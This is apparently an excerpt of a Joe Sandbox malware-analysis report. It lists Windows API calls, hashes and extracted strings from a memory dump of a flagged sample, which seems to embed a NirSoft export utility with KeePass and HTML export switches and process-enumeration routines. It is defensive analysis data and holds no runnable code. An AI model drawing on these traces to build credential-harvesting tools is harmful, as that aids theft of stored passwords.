                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1010922700-0
                                                                                                                                                              • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                              • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                              • malloc.MSVCRT ref: 004186B7
                                                                                                                                                              • free.MSVCRT ref: 004186C7
                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                              • free.MSVCRT ref: 004186E0
                                                                                                                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                              • malloc.MSVCRT ref: 004186FE
                                                                                                                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                              • free.MSVCRT ref: 00418716
                                                                                                                                                              • free.MSVCRT ref: 0041872A
                                                                                                                                                              • free.MSVCRT ref: 00418749
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                              • String ID: |A
                                                                                                                                                              • API String ID: 3356672799-1717621600
                                                                                                                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                              • API String ID: 2081463915-1959339147
                                                                                                                                                              • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                              • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                              • API String ID: 2012295524-70141382
                                                                                                                                                              • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                              • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                              • API String ID: 667068680-3953557276
                                                                                                                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1700100422-0
                                                                                                                                                              • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                              • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                              APIs
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 552707033-0
                                                                                                                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                              • strchr.MSVCRT ref: 0040C140
                                                                                                                                                              • strchr.MSVCRT ref: 0040C151
                                                                                                                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                              • memset.MSVCRT ref: 0040C17A
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                              • String ID: 4$h
                                                                                                                                                              • API String ID: 4066021378-1856150674
                                                                                                                                                              • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                              • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_snwprintf
                                                                                                                                                              • String ID: %%0.%df
                                                                                                                                                              • API String ID: 3473751417-763548558
                                                                                                                                                              • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                              • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                              APIs
                                                                                                                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                              • GetParent.USER32(?), ref: 00406136
                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                              • String ID: A
                                                                                                                                                              • API String ID: 2892645895-3554254475
                                                                                                                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                              APIs
                                                                                                                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                              • memset.MSVCRT ref: 0040DA23
                                                                                                                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                              • String ID: caption
                                                                                                                                                              • API String ID: 973020956-4135340389
                                                                                                                                                              • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                              • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                              • API String ID: 1283228442-2366825230
                                                                                                                                                              • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                              • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                              APIs
                                                                                                                                                              • wcschr.MSVCRT ref: 00413972
                                                                                                                                                              • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                              • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                              • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                              • memset.MSVCRT ref: 004139B8
                                                                                                                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                              • memset.MSVCRT ref: 00413A00
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                              • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                              • String ID: \systemroot
                                                                                                                                                              • API String ID: 4173585201-1821301763
                                                                                                                                                              • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                              • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
